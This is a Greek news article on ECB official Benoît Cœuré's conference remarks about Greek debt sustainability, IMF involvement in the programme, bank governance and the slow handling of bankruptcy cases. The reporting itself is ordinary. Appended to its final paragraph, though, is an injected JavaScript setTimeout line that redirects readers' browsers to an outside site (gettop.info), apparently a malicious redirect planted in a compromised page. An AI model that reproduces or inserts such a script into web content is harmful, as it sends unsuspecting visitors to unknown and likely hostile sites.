Μπενουά Κερέ: Αναζητούμε λύσεις στο θέμα του χρέους

0
6

 

Μιλώντας στο 27 συνέδριο του Ελληνοαμερικανικού Επιμελητηρίου, υπό τον τίτλο «Η ώρα της Ελληνικής Οικονομίας», το στέλεχος της Ευρωπαϊκής Κεντρικής Τράπεζας (ΕKT) Μπενουά Κερέ αναφέρθηκε στο θέμα του ελληνικού χρέους και τόνισε πως «όλα τα μέρη αντιλαμβάνονται πλέον ότι υπάρχει θέμα βιωσιμότητας του ελληνικού χρέους».

Όπως συμπλήρωσε «αναζητούμε λύσεις στο θέμα του ελληνικού χρέους», κάνοντας λόγο για λύσεις που θα επιτρέψουν την πλήρη συμμετοχή του ΔΝΤ στο ελληνικό πρόγραμμα, αποκαθιστώντας την εμπιστοσύνη και ανοίγοντας τον δρόμο για την επιστροφή της χώρας στις αγορές και προσέθεσε ότι η βιωσιμότητα του δημόσιου χρέους δεν αποτελεί τη μοναδική προϋπόθεση προκειμένου τα ελληνικά ομόλογα να συμπεριληφθούν στο πρόγραμμα ποσοτικής χαλάρωσης (QE).

Στη συνέχεια, ο κ. Κερέ υπογράμμισε την πρόοδο που έχει συντελεστεί στην Ελλάδα αλλά και τις προκλήσεις που συνεχίζει να αντιμετωπίζει η χώρα.

Υπογράμμισε ότι οι ελληνικές Αρχές θα πρέπει να δείξουν ισχυρή δέσμευση στην υλοποίηση των στόχων του προγράμματος, ενώ αναφερόμενος στις εξελίξεις στο τραπεζικό σύστημα, επεσήμανε ότι οι διοικήσεις των τραπεζών θα πρέπει να λειτουργούν χωρίς πολιτικές παρεμβάσεις.

«Οι σημαντικές προκλήσεις που εξακολουθεί να αντιμετωπίζει σήμερα η Ελλάδα μπορούν να αντιμετωπιστούν μόνο με τη σταθερή εφαρμογή των πολιτικών που έχουν συμφωνηθεί και με ισχυρή πολιτική βούληση από όλους τους ενδιαφερόμενους φορείς», ανέφερε ο κ. Κερέ.

Η αναμόρφωση των δομών διακυβέρνησης των τραπεζών σύμφωνα με τις νέες απαιτήσεις αποτελεί ένα βασικό στοιχείο. Στο πλαίσιο αυτό όπως επεσήμανε, «οι διοικήσεις των τραπεζών πρέπει να είναι απαλλαγμένες από κάθε πολιτική επιρροή και άλλα συμφέροντα».

Σχετικά με την πολιτική στον χρηματοπιστωτικό τομέα, ιδιαίτερη αναφορά έκανε ο κ. Κερέ στη μεταρρύθμιση του εξωδικαστικού μηχανισμού ρύθμισης οφειλών, διευκρινίζοντας ότι για να είναι αποτελεσματικός, πρέπει να ληφθεί υπόψη το γεγονός ότι οι ελληνικές επιχειρήσεις έχουν σημαντικά μη εξυπηρετούμενα δάνεια έναντι τραπεζών και σημαντικές ληξιπρόθεσμες οφειλές έναντι του Δημοσίου.

Πέρα από την ανάπτυξη αποτελεσματικού εξωδικαστικού μηχανισμού ρύθμισης οφειλών, οι ελληνικές αρχές πρέπει μειώσουν το χρονικό διάστημα για την έκδοση δικαστικής απόφασης σε περίπτωση πτώχευσης. Κατά μέσο όρο απαιτούνται περίπου 3,5 έτη, σε σύγκριση με χρονικό διάστημα μικρότερο των 6 μηνών στην Ιρλανδία, τη χώρα με την καλύτερη επίδοση στην Ευρωπαϊκή Ένωση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here